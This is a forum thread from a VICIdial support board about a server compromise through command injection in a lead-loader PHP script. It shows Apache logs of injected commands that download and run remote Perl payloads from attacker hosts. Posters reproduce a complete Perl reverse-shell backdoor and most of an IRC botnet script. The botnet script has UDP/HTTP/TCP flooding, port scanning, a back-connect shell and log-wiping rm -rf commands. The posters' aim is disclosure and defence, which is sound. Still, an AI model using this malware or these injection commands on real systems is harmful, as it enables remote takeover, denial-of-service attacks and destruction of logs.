We were hacked: Security vulnerability in lead loader

All installation and configuration problems and questions

Moderators: gerski, enjay, williamconley, Op3r, Staydog, gardo, mflorell, MJCoate, mcargile, Kumba, Michael_N

We were hacked: Security vulnerability in lead loader

Postby spacejanitor » Mon Jul 23, 2012 12:10 pm

Hi all, not sure if this has been addressed in a newer revision, but I will describe what happened to our cluster yesterday:


Yesterday we discovered a very strange activity at our firewall server - actually it was frozen suffering a kind of DOS attack.

Investigation shown that the source of this attack was one of our Telephony servers. After reboot attack stopped.

We started to examine logs. In /tmp directory we found a few files with virus content.
- dc.txt - Perl script that gives a shell access for hacker
- udp.pl - massive sendout of UDP packets
- udp.tgz - archive of udp.pl
- x.c - create a shell and try to assign UID of root to the shell

Files have owner "WWWRUN" and group "WWW"

And here are records from Apache access and error logs:
-------------------------------------
12.237.27.3 - bobh [22/Jul/2012:14:23:16 -0400] "POST /vicidial/new_listloader_superL.php HTTP/1.1" 401 45 "-" "libwww-perl/5.805"
-------------------------------------

-------------------------------------
[Sun Jul 22 14:23:23 2012] [error] [client new_listloader_superL.php] PHP Warning: fopen(cd /tmp;curl -O cox.x10.mx/.dc.txt;perl .dc.txt 12.237.27.3 45295): failed to open stream: No such fi
le or directory in /srv/www/htdocs/vicidial/new_listloader_superL.php on line 792
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 970 100 970 0 0 13624 0 --:--:-- --:--:-- --:--:-- 48500
-------------------------------------

bobh - is one of our users and he is not the hacker.

We have checked other requests, launched from ip:12.237.27.3 and here they are:
Access logs:
-------------------------------------
12.237.27.3 - - [21/Jul/2012:16:10:46 -0400] "GET /translators.html HTTP/1.1" 404 1047 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
12.237.27.3 - - [21/Jul/2012:23:22:34 -0400] "GET /phpmyadmin/translators.html HTTP/1.1" 404 1047 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
12.237.27.3 - - [22/Jul/2012:07:04:19 -0400] "GET /phpMyAdmin/translators.html HTTP/1.1" 404 1047 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
12.237.27.3 - 6666 [22/Jul/2012:14:23:23 -0400] "POST /vicidial/new_listloader_superL.php HTTP/1.1" 200 9519 "-" "libwww-perl/5.805"
12.237.27.3 - jamesa [06/Jul/2012:19:40:43 -0400] "POST /vicidial/new_listloader_superL.php HTTP/1.1" 200 9519 "-" "libwww-perl/5.805"
----------------

Error logs:
----------------
[Fri Jul 06 19:40:43 2012] [error] [client 12.237.27.3] PHP Warning: fopen(cd /tmp;curl -O cox.x10.mx/.dc.txt;perl .dc.txt 12.237.27.3 45295): failed to open stream: No such fi
le or directory in /srv/www/htdocs/vicidial/new_listloader_superL.php on line 792
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 970 100 970 0 0 12988 0 --:--:-- --:--:-- --:--:-- 26944


[Sat Jul 21 16:10:46 2012] [error] [client 12.237.27.3] File does not exist: /srv/www/htdocs/translators.html
[Sat Jul 21 23:22:34 2012] [error] [client 12.237.27.3] File does not exist: /srv/www/htdocs/phpmyadmin
[Sun Jul 22 07:04:19 2012] [error] [client 12.237.27.3] File does not exist: /srv/www/htdocs/phpMyAdmin
-------------------------------------

Apparently functionality of new_script "listloader_superL.php" permits to execute external applications.
It looks this functionality may be exploited to run malicious applications.


Here are some other strange requests that were executed in the same interval:
----------
88.191.79.63 - - [07/Jul/2012:04:28:06 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 647 "-" "ZmEu"
88.191.79.63 - - [07/Jul/2012:04:28:06 -0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 647 "-" "ZmEu"
88.191.79.63 - - [07/Jul/2012:04:28:06 -0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 647 "-" "ZmEu"
88.191.79.63 - - [07/Jul/2012:04:28:07 -0400] "GET /pma/scripts/setup.php HTTP/1.1" 404 647 "-" "ZmEu"
88.191.79.63 - - [07/Jul/2012:04:28:07 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 647 "-" "ZmEu"
88.191.79.63 - - [07/Jul/2012:04:28:07 -0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 647 "-" "ZmEu"

[Sat Jul 07 04:28:06 2012] [error] [client 88.191.79.63] File does not exist: /srv/www/htdocs/w00tw00t.at.blackhats.romanian.anti-sec:)
[Sat Jul 07 04:28:06 2012] [error] [client 88.191.79.63] File does not exist: /srv/www/htdocs/phpMyAdmin
[Sat Jul 07 04:28:06 2012] [error] [client 88.191.79.63] File does not exist: /srv/www/htdocs/phpmyadmin
[Sat Jul 07 04:28:07 2012] [error] [client 88.191.79.63] File does not exist: /srv/www/htdocs/pma
[Sat Jul 07 04:28:07 2012] [error] [client 88.191.79.63] File does not exist: /srv/www/htdocs/myadmin
[Sat Jul 07 04:28:07 2012] [error] [client 88.191.79.63] File does not exist: /srv/www/htdocs/MyAdmin


222.231.33.227 - - [07/Jul/2012:21:25:09 -0400] "GET HTTP/1.1 HTTP/1.1" 400 310 "-" "-"
222.231.33.227 - - [07/Jul/2012:21:25:09 -0400] "GET /tiki-8.3/htaccess.sh HTTP/1.1" 404 647 "-" "Toata dragostea mea pentru diavola"
222.231.33.227 - - [07/Jul/2012:21:25:10 -0400] "GET /tiki/htaccess.sh HTTP/1.1" 404 647 "-" "Toata dragostea mea pentru diavola"
222.231.33.227 - - [07/Jul/2012:21:25:10 -0400] "GET /htaccess.sh HTTP/1.1" 404 647 "-" "Toata dragostea mea pentru diavola"

[Sat Jul 07 21:25:09 2012] [error] [client 222.231.33.227] invalid request-URI HTTP/1.1
[Sat Jul 07 21:25:09 2012] [error] [client 222.231.33.227] File does not exist: /srv/www/htdocs/tiki-8.3
[Sat Jul 07 21:25:10 2012] [error] [client 222.231.33.227] File does not exist: /srv/www/htdocs/tiki
[Sat Jul 07 21:25:10 2012] [error] [client 222.231.33.227] File does not exist: /srv/www/htdocs/htaccess.sh


107.20.155.131 - - [07/Jul/2012:14:38:49 -0400] "HEAD /manager/status HTTP/1.1" 404 - "-" "Java/1.7.0"

[Sat Jul 07 14:38:49 2012] [error] [client 107.20.155.131] File does not exist: /srv/www/htdocs/manager


87.230.74.47 - - [08/Jul/2012:01:30:10 -0400] "GET /din.aspx?s=00000000&id=0&client=DynGate&p=10000001 HTTP/1.1" 404 1047 "-" "-"

[Sun Jul 08 01:30:10 2012] [error] [client 87.230.74.47] File does not exist: /srv/www/htdocs/din.aspx
Last edited by spacejanitor on Wed Jul 25, 2012 10:06 am, edited 1 time in total.
http://www.MarketResearchTechnology.com
We are the leading users of ViciDial, LimeSurvey and Drupal in the market research industry. We're also a lead provider- contact us.

Cluster Installation, ViciBox Server
VERSION: 2.6-372a
BUILD: 120713-2123
spacejanitor
 
Posts: 178
Joined: Tue Feb 08, 2011 3:31 pm

Re: We were hacked: Seurity vulnerability in lead loader

Postby williamconley » Mon Jul 23, 2012 2:19 pm

This would be why we highly recommend iptables whitelist. In this case the perpetrator would have to be someone you know, and that would be traceable. Set it up NOW.
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)

Re: We were hacked: Seurity vulnerability in lead loader

Postby Acidshock » Mon Jul 23, 2012 6:39 pm

You have phpMyAdmin loaded on the server? If so thats most likely where your real vulnerability actually is hiding. There are a lot of script kiddies looking for the vulnerability. Also make sure Vtiger is removed or locked down too.

viewtopic.php?f=8&t=22703&p=81097&hilit=phpmyadmin+hack

viewtopic.php?f=8&t=25501

Also what version of PHP do you have?
VERSION: 2.14-698a | BUILD: 190207-2301 | Asterisk:13.24.1-vici | Vicibox 8.1.2
Acidshock
 
Posts: 430
Joined: Wed Mar 03, 2010 3:19 pm

Re: We were hacked: Seurity vulnerability in lead loader

Postby mflorell » Tue Jul 24, 2012 3:25 pm

This is a new vulnerability, we patched a similar one a few months ago. Just this morning we deleted the old lead loaders from the web directory(we actually just moved them into extras), if you upgrade to the most recent svn/trunk will not be vulnerable to this exploit.

It is a DDoS toolkit it seems that uses these exploits, so it is not really a full hack, it just uses an unprivileged user to ping-flood a set destination.
mflorell
Site Admin
 
Posts: 18387
Joined: Wed Jun 07, 2006 2:45 pm
Location: Florida

Re: We were hacked: Security vulnerability in lead loader

Postby DomeDan » Tue Jul 31, 2012 4:01 am

mflorell: its not just ping-flood, they downloaded .dc.txt in the fopen-function as you can see here:
[Sun Jul 22 14:23:23 2012] [error] [client new_listloader_superL.php] PHP Warning: fopen(cd /tmp;curl -O cox.x10.mx/.dc.txt;perl .dc.txt 12.237.27.3 45295): failed to open stream: No such fi
le or directory in /srv/www/htdocs/vicidial/new_listloader_superL.php on line 792
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 970 100 970 0 0 13624 0 --:--:-- --:--:-- --:--:-- 48500
-------------------------------------

and it worked because the error-log contain output from curl: "% Total % Received % Xferd Average Speed Time Time Time Current"
then it was executed, this is the perl-code in .dc.txt:
Code: Select all
#!/usr/bin/perl
      use Socket;
      print "Devil Data Connecting Backdoor\n\n";
      if (!$ARGV[0]) {
        printf "Usage: $0 [Host] <Port>\n";
        exit(1);
      }
      print "[*] Dumping Arguments\n";
      $host = $ARGV[0];
      $port = 80;
      if ($ARGV[1]) {
        $port = $ARGV[1];
      }
      print "[*] Connecting to host...\n";
      $proto = getprotobyname('tcp') || die("Unknown Protocol\n");
      socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
      my $target = inet_aton($host);
      if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
        die("Unable to Connect\n");
      }
      print "[*] Spawning Shell to host...\n";
      if (!fork( )) {
        open(STDIN,">&SERVER");
        open(STDOUT,">&SERVER");
        open(STDERR,">&SERVER");
        exec {'/bin/sh'} '-bash' . "\0" x 4;
        exit(0);
      }
      print "[*] Detached, waiting for instructions\n\n";

and yeah its a remote shell as spacejanitor said


The exploit is not fixed because $lead_file is not stripped from bad characters, this is from third and forth gen listloader (rev 1844):
grep 'lead_file' trunk/www/vicidial/admin_listloader_fourth_gen.php wrote:if (isset($_GET["lead_file"])) {$lead_file=$_GET["lead_file"];}
elseif (isset($_POST["lead_file"])) {$lead_file=$_POST["lead_file"];}
$file=fopen("$lead_file", "r");


My guess is that the attacker used the exploit in vtiger to get access to the listloader, spacejanitor: look in the access_log if someone been here: /srv/www/htdocs/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php

I will see if I can reproduce the exploit and post a fix
Vicidial Partner. Region: Sweden/Norway.
Does Vicidial installation, configuration, customization, add-ons, CRM implementation, support, upgrading, network-related, pentesting etc. Remote and onsite assistance.
Email: domedan (at) gmail.com
DomeDan
 
Posts: 1226
Joined: Tue Jan 04, 2011 9:17 am
Location: Sweden

Re: We were hacked: Security vulnerability in lead loader

Postby mflorell » Tue Jul 31, 2012 6:19 am

Thank you very much for looking into this.
mflorell
Site Admin
 
Posts: 18387
Joined: Wed Jun 07, 2006 2:45 pm
Location: Florida

Re: We were hacked: Security vulnerability in lead loader

Postby rrb555 » Tue Jul 31, 2012 12:08 pm

I have the same error_logs :(

Code: Select all
[Mon Jul 23 07:52:18 2012] [error] [client 94.25.124.162] PHP Warning:  fopen(;cd /tmp;wget http://am.highandtech.com/vici.txt;perl vici.txt;rm -rf vici.txt;): failed to open st
ream: No such file or directory in /srv/www/htdocs/vicidial/new_listloader_superL.php on line 801
--2012-07-23 07:52:18--  http://am.highandtech.com/vici.txt
Resolving am.highandtech.com... 64.15.156.74
Connecting to am.highandtech.com|64.15.156.74|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26531 (26K) [text/plain]
Saving to: `vici.txt'

     0K .......... .......... .....                           100% 38.5K=0.7s

2012-07-23 07:52:19 (38.5 KB/s) - `vici.txt' saved [26531/26531]
One server that I am managing | Single Server | ViciBox Redux 6.0 | VERSION: 2.12-549a | BUILD: 160404-0940 | revision 2508| No other hardware
For help you can send me a direct email info@support.com.ph
rrb555
 
Posts: 585
Joined: Tue Feb 08, 2011 4:24 pm
Location: Quezon City, Philippines

Re: We were hacked: Security vulnerability in lead loader

Postby DomeDan » Tue Jul 31, 2012 3:21 pm

That one is a bit different. here is the file vici.txt:
Code: Select all
#!/usr/bin/perl
###########################################################
#-PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--#
###########################################################
# Legend Soldier [2012] DO NOT FUCKIN SHARE!        #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# Just the same old re-runs...              #
###########################################################
# Added:                    #
# !legend @httpflood <host> <time>           #
# !legend @clean                 #
# !legend @visit <webpage>              #
# Oldies:                    #
# !legend @system                 #
# !legend @portscan <ip>              #
# !legend @nmap <ip> <beginport> <endport>        #
# !legend @back <ip><port>              #
# !legend @sqlflood <host> <time>           #
# !legend @udp <host> <packet size> <time>        #
# !legend @udp2 <host> <packet size> <time> <port>      #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
###########################################################

###########################################################
#      addiCteD tO null!!!           #
###########################################################

####################[Configuration]########################
###########################################################
my $hidden = 'init [3]';
my $linas_max='4';
my $sleep='5';
my @admins=("ARZ","god","Zax");
my @hostauth=("legendteam.info");
my @channels=("#vici");
my $nick='legend';
my $ircname ='vici';
my $realname = 'legend secrets!';
my $server='space.legendteam.info';
my $port='6667';
###########################################################
####################[Configuration]########################
###########################################################
####################[lets start..]#########################
###########################################################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
use LWP::UserAgent;
chdir("/");
$0="$hidden"."\0"x16;;
my $pid=fork;
exit if $pid;
die "fork problem: $!" unless defined($pid);
###########################################################
####################[lets start..]#########################
###########################################################
####################[Connecting...]########################
###########################################################
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $server_con = $_[1];
   my $port_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con", PeerPort=>$port_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
     $irc_servers{$IRC_cur_socket}{'port'} = "$port_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
     sleep 1;
   }
}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}
###########################################################
####################[Connecting...]########################
###########################################################
####################[..Connected..]########################
###########################################################
sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION Legend IRC [2010]\001");
       }
       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
       if (grep {$_ =~ /^\Q$pn\E$/i } @admins) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\!legend)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         }
       }
   }
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4;
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       nick("$meunick-".int rand(9999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $channel (@channels) {
         sendraw("JOIN $channel sexy");
       }
   }
}

###########################################################
####################[..Functions..]########################
###########################################################

sub bfunc {
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {

###########################################################
######################[..@system..]########################
###########################################################

         if ($funcarg =~ /^system/) {
            $uname=`uname -a`;
            $uptime=`uptime`;
            $ownd=`pwd`;
            $distro=`cat /etc/issue`;
            $id=`id`;
            $un=`uname -sro`;
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uname -a: 14 $uname");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uptime: 14 $uptime");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Process: 14 $hidden");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2ID: 14 $id");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Dir: 14 $ownd");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2OS: 14 $distro");
         }

###########################################################
######################[..@system..]########################
###########################################################

###########################################################
######################[.@portscan.]########################
###########################################################

         if ($funcarg =~ /^portscan (.*)/) {
            my $hostip="$1";
            @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
            my (@aberta, %porta_banner);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Scanning for open ports on ".$1." 12 started .");
            foreach my $porta (@portas)  {
               my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
                  'tcp', Timeout => 4);
               if ($scansock) {
                  push (@aberta, $porta);
                  $scansock->close;
               }
            }
 
            if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Open ports founded: @aberta");
            } else {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 No open ports foundend.");
            }
         }

###########################################################
######################[.@portscan.]########################
###########################################################


###########################################################
########################[.@Visit.]#########################
###########################################################

         if ($funcarg =~ /^visit (.*)/) {
  my $url = "$1";
my $ua = LWP::UserAgent->new;
 $ua->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0');

 $ua->timeout(10);
 $ua->env_proxy;
 
 my $response = $ua->get($url);
 
 if ($response->is_success) {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Visit2:.4 Got Response From $url.");
 }
 else {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Visit2:.4 Failed Getting Response From $url.");
 }


}


###########################################################
########################[.@Visit.]#########################
###########################################################

###########################################################
######################[.@tcpflood.]########################
###########################################################

           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
 sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:.4 TCP Attacking14 ".$1.":".$2." 2for4 ".$3." 2seconds.");
        my $itime = time;
        my ($cur_time);
             $cur_time = time - $itime;
        while ($3>$cur_time){
             $cur_time = time - $itime;
        &tcpflooder("$1","$2","$3");
             }
        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:. 4TCP Attack done 14".$1.":".$2.".");
           }

###########################################################
######################[.@tcpflood.]########################
###########################################################

###########################################################
#####################[.@httpflood.]########################
###########################################################

           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking14 ".$1." 4for4 ".$2." 2seconds.");
        my $itime = time;
        my ($cur_time);
             $cur_time = time - $itime;
        while ($2>$cur_time){
             $cur_time = time - $itime;
        my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
        close($socket);
             }
        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking done ".$1.".");
           }
###########################################################
#####################[.@httpflood.]########################
###########################################################

###########################################################
######################[.@sqlflood.]########################
###########################################################

if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking 4 ".$1." 14 on port 3306 for 4 ".$2." 2 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
   my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
   print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking done 14 ".$1.".");
}

###########################################################
######################[.@sqlflood.]########################
###########################################################

###########################################################
######################[.@udpflood.]########################
###########################################################
           if ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Attacking14 ".$1." 4with2 ".$2." 2KB(s) for4 ".$3." 2seconds.");
             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1.".");
           }
###########################################################
######################[.@udpflood.]########################
###########################################################

###########################################################
######################[.@udp2flood.]########################
###########################################################
           if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Attacking14 ".$1.":".$4." 2with4 ".$2." 2KB(s) for4 ".$3." 2seconds.");
             my ($dtime, %pacotes) = udpflooder2("$1", "$2", "$3","$4");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1.".");
           }
############################################################


###########################################################
######################[.@cleanlogs.]#######################
###########################################################

if ($funcarg =~ /^cleanlogs/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 This process can be long2,4 just wait2!");
    system 'rm -rf /var/log/lastlog';
    system 'rm -rf /var/log/wtmp';
   system 'rm -rf /etc/wtmp';
   system 'rm -rf /var/run/utmp';
   system 'rm -rf /etc/utmp';
   system 'rm -rf /var/log';
   system 'rm -rf /var/logs';
   system 'rm -rf /var/adm';
   system 'rm -rf /var/apache/log';
   system 'rm -rf /var/apache/logs';
   system 'rm -rf /usr/local/apache/log';
   system 'rm -rf /usr/local/apache/logs';
   system 'rm -rf /root/.bash_history';
   system 'rm -rf /root/.ksh_history';
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 All default log and bash_history files erased");
      sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Now Erasing the rest of the machine log files");
   system 'find / -name *.bash_history -exec rm -rf {} \;';
   system 'find / -name *.bash_logout -exec rm -rf {} \;';
   system 'find / -name "log*" -exec rm -rf {} \;';
   system 'find / -name *.log -exec rm -rf {} \;';
      sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Done! All logs erased");
      }

###########################################################
######################[.@cleanlogs.]#######################
###########################################################

###########################################################
########################[..@back..]########################
###########################################################

         if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
            my $host = "$1";
            my $porta = "$2";
            my $proto = getprotobyname('tcp');
            my $iaddr = inet_aton($host);
            my $paddr = sockaddr_in($porta, $iaddr);
            my $shell = "/bin/sh -i";
            if ($^O eq "MSWin32") {
               $shell = "cmd.exe";
            }
            socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
            connect(SOCKET, $paddr) or die "connect: $!";
            open(STDIN, ">&SOCKET");
            open(STDOUT, ">&SOCKET");
            open(STDERR, ">&SOCKET");
            system("$shell");
            close(STDIN);
            close(STDOUT);
            close(STDERR);
            if ($estatisticas){
               sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Back Connect2:.14 Connecting to 2 $host:$porta");
            }
         }

###########################################################
########################[..@back..]########################
###########################################################



###########################################################
#########################[.@nmap.]#########################
###########################################################

   if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
         my $hostip="$1";
         my $portstart = "$2";
         my $portend = "$3";
         my (@abertas, %porta_banner);
       sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Scanning $1 For Ports:  $2-$3");
       foreach my $porta ($portstart..$portend){
               my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
    if ($scansock) {
                 push (@abertas, $porta);
                 $scansock->close;
                 if ($xstats){
        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Founded $porta"."/Open");
                 }
               }
             }
             if (@abertas) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Complete");
             } else {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 No open ports have been founded");
             }
          }
###########################################################
#########################[.@nmap.]#########################
###########################################################



           exit;
       }
  }
}
 
sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   }
   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
